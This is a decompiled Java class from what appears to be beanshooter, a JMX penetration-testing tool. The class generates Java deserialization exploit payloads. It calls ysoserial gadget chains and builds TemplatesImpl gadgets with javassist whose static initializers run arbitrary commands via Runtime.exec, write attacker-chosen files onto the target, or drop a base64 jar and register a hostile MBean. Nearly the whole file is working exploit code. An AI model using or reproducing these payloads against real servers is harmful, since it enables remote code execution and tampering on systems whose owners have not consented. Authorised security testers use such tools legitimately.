/*
 * Decompiled with CFR 0.152.
 */
package de.qtc.beanshooter.utils;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import de.qtc.beanshooter.cli.ArgumentHandler;
import de.qtc.beanshooter.exceptions.ExceptionHandler;
import de.qtc.beanshooter.io.Logger;
import de.qtc.beanshooter.mbean.MBean;
import de.qtc.beanshooter.operation.BeanshooterOption;
import de.qtc.beanshooter.utils.Utils;
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Arrays;
import java.util.Base64;
import javassist.CannotCompileException;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.NotFoundException;
import org.apache.commons.io.IOUtils;

public class YsoIntegration {
    private static final String[] templateGadgets = new String[]{"template-exec", "template-upload", "template-tonka"};

    private static URLClassLoader getClassLoader() throws MalformedURLException {
        File ysoJar = new File((String)ArgumentHandler.require(BeanshooterOption.YSO));
        if (!ysoJar.exists()) {
            ExceptionHandler.ysoNotPresent((String)BeanshooterOption.YSO.getValue());
        }
        return new URLClassLoader(new URL[]{ysoJar.toURI().toURL()});
    }

    public static Object getPayloadObject(String gadget, String command) {
        Object ysoPayload = null;
        if (Arrays.asList(templateGadgets).contains(gadget)) {
            return YsoIntegration.getTemplateGadget(gadget, command);
        }
        try {
            URLClassLoader ucl = YsoIntegration.getClassLoader();
            Class<?> yso = Class.forName("ysoserial.payloads.ObjectPayload$Utils", true, ucl);
            Method method = yso.getDeclaredMethod("makePayloadObject", String.class, String.class);
            Logger.print("Creating ysoserial payload...");
            ysoPayload = method.invoke(null, gadget, command);
        }
        catch (Exception e) {
            Logger.printlnPlain(" failed.");
            Logger.eprintlnMixedYellow("Caught unexpected", e.getClass().getName(), "during gadget generation.");
            Logger.eprintMixedBlue("You probably specified", "a wrong gadget name", "or an ");
            Logger.eprintlnPlainBlue("invalid gadget argument.");
            Utils.exit(e);
        }
        Logger.printlnPlain(" done.");
        return ysoPayload;
    }

    private static Object getTemplateGadget(String gadget, String command) {
        if (gadget.equals("template-tonka")) {
            return YsoIntegration.getTonkaTemplateGadget();
        }
        if (gadget.equals("template-exec")) {
            return YsoIntegration.getCommandTemplateGadget(command);
        }
        if (gadget.equals("template-upload")) {
            return YsoIntegration.getUploadTemplateGadget(command);
        }
        ExceptionHandler.internalError("getTemplateGadget", "A non existing gadget was requested.");
        return null;
    }

    private static Object getTonkaTemplateGadget() {
        byte[] content = null;
        String base64 = null;
        InputStream stream = YsoIntegration.class.getResourceAsStream("/" + MBean.TONKA.getJarName());
        if (stream == null) {
            Logger.printlnMixedYellow("Unable to find", MBean.TONKA.getJarName(), "within beanshooter.jar.");
            Logger.printlnMixedBlue("This", "is not", "supposed to happen.");
            Utils.exit();
        }
        try {
            content = IOUtils.toByteArray(stream);
        }
        catch (IOException e) {
            Logger.printlnMixedYellow("Caught unexpected", "IOException", "while reading " + MBean.TONKA.getJarName() + ".");
            Utils.exit(e);
        }
        base64 = new String(Base64.getEncoder().encode(content));
        String java = "java.io.File f = java.io.File.createTempFile(\"tonka-bean\", \".jar\");";
        java = java + String.format("java.nio.file.Files.write(f.toPath(), java.util.Base64.getDecoder().decode(\"%s\"), new java.nio.file.StandardOpenOption[0]);", base64);
        java = java + "java.net.URLClassLoader ucls = new java.net.URLClassLoader(new java.net.URL[] {f.toURI().toURL()});";
        java = java + "Class tonkaBeanClass = java.lang.Class.forName(\"de.qtc.beanshooter.tonkabean.TonkaBean\", true, ucls);";
        java = java + "Object instance = tonkaBeanClass.newInstance();";
        java = java + String.format("java.lang.management.ManagementFactory.getPlatformMBeanServer().registerMBean(instance, new javax.management.ObjectName(\"%s\"));", MBean.TONKA.getObjectName().toString());
        java = java + "f.delete();";
        return YsoIntegration.templateGadgetFromJava(java);
    }

    private static Object getUploadTemplateGadget(String command) {
        String base64 = null;
        String[] split = command.split("::");
        if (split.length != 2) {
            Logger.eprintlnMixedYellow("Invalid upload parameter:", command);
            Logger.eprintlnMixedBlue("The expected format is:", "<SRC>::<DST>");
            Utils.exit();
        }
        try {
            byte[] content = Files.readAllBytes(Paths.get(split[0], new String[0]));
            base64 = new String(Base64.getEncoder().encode(content));
        }
        catch (IOException e) {
            ExceptionHandler.handleFileRead(e, split[0], true);
        }
        String java = String.format("java.nio.file.Files.write(new java.io.File(\"%s\").toPath(), java.util.Base64.getDecoder().decode(\"%s\"), new java.nio.file.StandardOpenOption[0]);", split[1], base64);
        return YsoIntegration.templateGadgetFromJava(java);
    }

    private static Object getCommandTemplateGadget(String command) {
        String escCommand = command.replace("\\", "\\\\").replace("\"", "\\\"");
        String java = String.format("java.lang.Runtime.getRuntime().exec(\"%s\");", escCommand);
        if (BeanshooterOption.STANDARD_EXEC_ARRAY.getBool()) {
            String[] cmd = escCommand.split(" ", 3);
            java = String.format("java.lang.Runtime.getRuntime().exec(new String[] { \"%s\", \"%s\", \"%s\" } );", cmd[0], cmd[1], cmd[2]);
        }
        return YsoIntegration.templateGadgetFromJava(java);
    }

    private static Object templateGadgetFromJava(String java) {
        byte[] payloadBytes = null;
        byte[] dummyBytes = null;
        try {
            ClassPool pool = ClassPool.getDefault();
            CtClass payloadClass = pool.makeClass("de.qtc.beanshooter.utils.TransletPayloadStub" + System.nanoTime());
            payloadClass.setSuperclass(pool.get(AbstractTranslet.class.getName()));
            payloadClass.addInterface(pool.getCtClass(Serializable.class.getName()));
            payloadClass.makeClassInitializer().insertAfter(java);
            CtClass dummyClass = pool.makeClass("de.qtc.beanshooter.utils.Foo" + System.nanoTime());
            dummyClass.addInterface(pool.getCtClass(Serializable.class.getName()));
            payloadBytes = payloadClass.toBytecode();
            dummyBytes = dummyClass.toBytecode();
        }
        catch (IOException | CannotCompileException | NotFoundException e) {
            Logger.printlnMixedYellow("Caught", e.getClass().getName(), "during dynamic class generation.");
            Utils.exit(e);
        }
        return YsoIntegration.createTemplateGadget(payloadBytes, dummyBytes);
    }

    private static Object createTemplateGadget(byte[] payloadBytes, byte[] dummyBytes) {
        TemplatesImpl template = new TemplatesImpl();
        try {
            Field bytecodeField = template.getClass().getDeclaredField("_bytecodes");
            bytecodeField.setAccessible(true);
            bytecodeField.set(template, new byte[][]{payloadBytes, dummyBytes});
            Field nameField = template.getClass().getDeclaredField("_name");
            nameField.setAccessible(true);
            nameField.set(template, "Pwnr");
            Field templateField = template.getClass().getDeclaredField("_tfactory");
            templateField.setAccessible(true);
            templateField.set(template, TransformerFactoryImpl.class.newInstance());
        }
        catch (IllegalAccessException | IllegalArgumentException | InstantiationException | NoSuchFieldException | SecurityException e) {
            Logger.printlnMixedYellow("Caught", e.getClass().getName(), "while creating TemplatesIml object.");
            Utils.exit(e);
        }
        return template;
    }
}

